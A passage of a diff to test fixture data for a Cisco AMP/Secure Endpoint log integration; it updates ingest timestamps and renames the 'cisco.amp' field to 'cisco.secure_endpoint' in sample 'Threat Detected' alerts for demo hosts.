                         "active": true,
@@ -532,7 +532,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271901953Z",
+                "ingested": "2021-09-27T00:41:21.853387704Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -543,7 +543,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -615,7 +615,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271903942Z",
+                "ingested": "2021-09-27T00:41:21.853389464Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -626,7 +626,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -698,7 +698,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271905830Z",
+                "ingested": "2021-09-27T00:41:21.853391220Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -709,7 +709,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -781,7 +781,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271907735Z",
+                "ingested": "2021-09-27T00:41:21.853392972Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -792,7 +792,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -864,7 +864,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271909623Z",
+                "ingested": "2021-09-27T00:41:21.853394726Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -875,7 +875,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -947,7 +947,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271911811Z",
+                "ingested": "2021-09-27T00:41:21.853396649Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -958,7 +958,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1030,7 +1030,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271913736Z",
+                "ingested": "2021-09-27T00:41:21.853398431Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1041,7 +1041,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1113,7 +1113,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271915654Z",
+                "ingested": "2021-09-27T00:41:21.853400175Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1124,7 +1124,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1196,7 +1196,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271917544Z",
+                "ingested": "2021-09-27T00:41:21.853401925Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1207,7 +1207,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1279,7 +1279,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271919448Z",
+                "ingested": "2021-09-27T00:41:21.853403656Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1290,7 +1290,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1362,7 +1362,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271921422Z",
+                "ingested": "2021-09-27T00:41:21.853405588Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1373,7 +1373,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1441,7 +1441,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271923288Z",
+                "ingested": "2021-09-27T00:41:21.853407347Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1452,7 +1452,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "GenericKD:Dyreza-tpd",
                     "computer": {
                         "active": true,
@@ -1524,7 +1524,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271925171Z",
+                "ingested": "2021-09-27T00:41:21.853409098Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":944000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251507855228943\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1535,7 +1535,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.File.MalParent",
                     "computer": {
                         "active": true,
@@ -1607,7 +1607,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271927056Z",
+                "ingested": "2021-09-27T00:41:21.853410869Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251507855229000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1618,7 +1618,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.3372C1EDAB-100.SBX.TG",
                     "computer": {
                         "active": true,
@@ -1690,7 +1690,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:53.271928939Z",
+                "ingested": "2021-09-27T00:41:21.853412580Z",
